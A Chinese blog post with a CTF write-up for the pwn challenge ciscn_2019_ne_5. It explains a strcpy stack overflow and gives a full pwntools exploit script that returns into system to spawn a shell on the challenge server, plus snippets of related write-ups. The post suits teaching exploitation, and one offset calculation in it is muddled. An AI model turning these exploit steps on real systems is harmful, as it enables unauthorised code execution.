[PWN]ciscn_2019_ne_5

已于 2022-11-27 19:23:23 修改
阅读量326 收藏
点赞数 2
分类专栏: PWN 文章标签: 系统安全 linux 安全
于 2022-11-27 16:27:52 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_55700752/article/details/128065877
版权
本文详细介绍了对CISCN 2019 NE 5文件的分析过程,通过检查文件信息和使用IDA Pro发现了一个栈溢出漏洞。通过构造特定payload,利用strcpy函数的溢出,覆盖返回地址,设置system函数地址和'/bin/sh'字符串地址,最终成功触发system(‘bin/sh’)执行,获取shell。文章展示了漏洞利用的完整步骤和exploit脚本。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

ciscn_2019_ne_5

1.查看文件信息

checksec一下:32位文件,开启了NX保护

image-20221125211736065

尝试运行:

image-20221125212354428

2.IDA分析

在函数里面发现GetFlag函数,函数功能是将src字符串复制到dest中

image-20221126103510107

可以看到src读入的时候可以读入128位,在strcpy函数使用时可以造成栈溢出,覆盖返回地址

48+4 = 4c 个字符就可以构造到返回地址,

希望执行system(‘bin/sh’)函数来获取shell,需要system函数地址和’/bin/sh’字符串的地址

image-20221126105602553

在左侧函数菜单中发现system函数,得到地址:0x80484D0

image-20221126111010501

接下来查找’'/bin/sh’字符串地址,用ROPgadget搜索一下程序里的’/bin/sh’字符串的地址

ROPgadget --binary ciscn_2019_ne_5 --string ‘/bin/sh’

多次尝试,只能找到’sh’,一样可以使用:0x80482ea

由此,构造payload:

"1234"是执行system函数之前压入的返回地址

payload = ‘a’*(0x48+4)+p32(sys_add)+“1234”+p32(bin_sh)

3.构造exp脚本

from pwn import *
r = remote('node4.buuoj.cn',29486)
#context.log_level = 'debug'
sys_add = 0x80484D0
bin_sh = 0x080482ea
r.recvuntil('Please input admin password:')
r.sendline('administrator')
payload = 'a'*(0x48+4)+p32(sys_add)+"1234"+p32(bin_sh)
r.sendlineafter(':','1')
r.sendlineafter('info:',payload)
r.sendlineafter(':','4')
r.interactive()

成功得到flag

image-20221127162224292

ciscn_2019_ne_5
m0_52231248的博客
11-15 383
ciscn_2019_ne_5 Checksec: Ida: 首先会让我们输入密码,密码正确就会进入一个switch循环 我们看到循环中case4是调用catflag函数,跟进查看 Catflag函数中存在strcpy(dest,src)dest(offest)=0x44+4,只要我们能控制src就会存在溢出 再次回到main我们发现case1调用的addlog可以让我们输入src 于是思路就很清楚了先case1调用addlog输入我们的payload再case4将pa
[BUUCTF]-PWN:ciscn_2019_n_3解析
2301_79326813的博客
01-20 924
堆题,先看保护32位,Partial RELRO,没pie关键信息就那么多,看ida大致就是alloc创建堆块,free释放堆块,dump打印堆块内容但是仔细看这三个函数就可以发现在实际运行中,会先创建一个存有free相关函数的地址和打印堆块内容相关函数的地址。看delete函数并结合动态调试,可以知道释放堆块的过程实际上是调用先创造的12字节堆块的rec_str_free。那也就意味着无论那块地址存的是哪里的地址,我们在free堆块时他都会执行,并且题目给了我们system。
[BUUCTF]PWN——ciscn_2019_ne_5
mcmuyanga的博客
10-04 2598
ciscn_2019_ne_5 题目附件 步骤: 例行检查,32位,开启了nx保护 试运行一下程序,看一下程序的大概执行情况 32位ida载入,shift+f12查看程序里的字符串,发现了flag字符串 双击跟进,ctrl+x找到调用的函数,得到提示我们输入的log就是flag 看一下main函数,s1在接收admin的密码administrator,这边读入了100个长度的字符,看到15行,给s1的大小只有48,这边存在溢出漏洞 根据之前那个flag的提示,之后我们应该选1,添加一个log,之后
BUUCTF(pwn)ciscn_2019_ne_5
半岛铁盒的博客
03-30 261
先点进去 cat flag 说了 在 1 log中 from pwn import* r=remote('node3.buuoj.cn',26204) sys=0x80486b9 sh=0x080482ea r.sendlineafter("Please input admin password:",administrator) r.sendlineafter("0.Exit\n:",1) payload='a'*(0x48+4)+p32(sys)+p32(sh) r.sendlineaf...
ciscn-2019-ne-3
11-08
【标题】"ciscn-2019-ne-3" 指向的可能是一个网络安全竞赛或挑战,其中 "ciscn" 可能代表 China International Security Conference Network 或类似的网络安全活动,而 "2019-ne-3" 也许是该活动2019年中的第三个...
CISCN 2019 NE-3 挑战赛的漏洞利用分析
资源摘要信息:"ciscn-2019-ne-3" 一、文件标题解析 标题“ciscn-2019-ne-3”可能代表了一个特定的信息安全竞赛(如“ciscn”可能指代China Internet Security Competition Network,即中国互联网安全竞赛网络)中...
[BUUCTF]Pwn刷题记录
x0r
10-13 329
本部分内容长期更新,不再创建新文章影响阅读 rip 根据IDA加载入main函数声明发现s数组距离rbp的距离为F,即为15,这里的运行环境是64位,所以应当将Caller's rbp的数据填满,在这里是8位,即可构造payload from pwn import * p=remote("node4.buuoj.cn", 25401) #p=process("./pwn1") payload=b...
[CTF] ciscn_2019_ne_5
凉水的博客
06-13 572
ciscn_2019_ne_5
【BUUCTFPWNciscn_2019_ne_5
m0_55368674的博客
01-15 309
【BUUCTFPWNciscn_2019_ne_5
[buuctf]ciscn_2019_ne_5
逆向萌新的博客
11-05 1945
buuctf ciscn_2019_ne_5题目分析
ciscn_2019_n_5
、moddemod
06-17 357
exp #!/usr/bin/env python3 # coding=utf-8 from pwn import * from LibcSearcher import * context(log_level = 'debug') proc_name = './ciscn_2019_n_5' # p = process(proc_name) p = remote('node3.buuoj.cn', 28451) elf = ELF(proc_name) p.sendline('a'.encode()).
BUUCTF pwn——ciscn_2019_ne_5
CNS-Enterprise BCC-1701-J
04-09 222
BUUCTF 做题练习
BUUCTF ciscn_2019_ne_5
最新发布
2401_88087539的博客
01-14 468
pwn新手小白,写完题后整理的一点点思路,有借鉴其他wp,有任何问题各位师傅可以提出,接收批评指正
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值